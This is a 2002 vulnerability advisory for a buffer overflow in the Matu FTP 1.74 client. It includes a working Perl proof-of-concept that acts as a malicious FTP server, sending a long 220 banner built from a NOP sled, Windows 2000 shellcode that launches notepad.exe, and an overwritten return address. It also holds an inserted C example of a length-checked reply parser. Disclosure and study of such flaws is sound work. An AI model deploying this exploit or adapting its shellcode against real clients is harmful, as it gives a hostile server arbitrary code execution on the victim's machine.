Matu FTP remote buffer overflow vulnerability

by Nikola Strahija on April 23rd, 2002

Matu FTP is a Japanese FTP client for the Win32 platform. An exploitable buffer overflow was found in Matu FTP version 1.74.


The buffer overflow occurs when a long string like

220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA

is received by Matu FTP at the beginning of an FTP session.
This vulnerability allows a malicious FTP server to execute
arbitrary code on client hosts.
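
The check whose absence produces this class of bug, as an added example (not code from Matu FTP or from the advisory): a reply-line parser that compares the banner length with the destination buffer before copying and rejects oversized lines. The function name, the status codes and the 256-byte limit are assumptions made for illustration, and the oversized banner is constructed.

```c
#include <stdio.h>
#include <string.h>

#define REPLY_TEXT_MAX 256 /* assumed limit, not a value from the advisory */

enum reply_status { REPLY_OK, REPLY_INCOMPLETE, REPLY_TOO_LONG, REPLY_MALFORMED };

/* Parse one reply line ("220 text\r\n") out of raw received bytes. The text
 * length is checked against text_cap before any copy, so an oversized banner
 * is rejected instead of being written past the end of the buffer. */
enum reply_status parse_reply(const unsigned char *in, size_t in_len,
                              int *code, char *text, size_t text_cap)
{
    const unsigned char *eol = memchr(in, '\n', in_len);
    size_t line_len, text_len, i;
    if (eol == NULL) /* no terminator yet: allow more reads only up to a limit */
        return in_len > text_cap + 4 ? REPLY_TOO_LONG : REPLY_INCOMPLETE;
    line_len = (size_t)(eol - in);
    if (line_len > 0 && in[line_len - 1] == '\r')
        line_len--;

    /* Three digits, then ' ' (final line) or '-' (continuation line). */
    if (line_len < 4 || (in[3] != ' ' && in[3] != '-'))
        return REPLY_MALFORMED;
    for (i = 0; i < 3; i++)
        if (in[i] < '0' || in[i] > '9')
            return REPLY_MALFORMED;

    text_len = line_len - 4;
    if (text_len >= text_cap) /* keep one byte for the terminating NUL */
        return REPLY_TOO_LONG;

    *code = (in[0] - '0') * 100 + (in[1] - '0') * 10 + (in[2] - '0');
    memcpy(text, in + 4, text_len);
    text[text_len] = '\0';
    return REPLY_OK;
}

int main(void)
{
    unsigned char banner[4 + 400 + 2]; /* constructed oversized greeting */
    char text[REPLY_TEXT_MAX];
    int code = 0;
    memcpy(banner, "220 ", 4);
    memset(banner + 4, 'A', 400);
    memcpy(banner + 404, "\r\n", 2);
    printf("status=%d\n", parse_reply(banner, sizeof banner, &code, text, sizeof text));
    return 0;
}
```

A caller should close the connection on REPLY_TOO_LONG or REPLY_MALFORMED rather than truncate the line and continue.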


/*---------------------------
Vendor Status
---------------------------*/
Notified with no response


/*---------------------------
POC
---------------------------*/
This exploit code is invoked as an FTP server through inetd.

#!/usr/local/bin/perl

#------------------------------------------------------
# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
# ( run under inetd )
# written by Kanatoko
# http://www.jumperz.net/
#------------------------------------------------------
$|=1;

#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

#egg_address = 0x0012F43C
$buf = "\x90" x 217;
$buf .= $egg;
$buf .= "A" x 2;
$buf .= "\x3C\xF4\x12\x00";
$buf .= "B" x 80;

print "220 $buf\r\n";

--

#sorry for the bad English

Kanatoko
http://www.jumperz.net/ (Japanese)


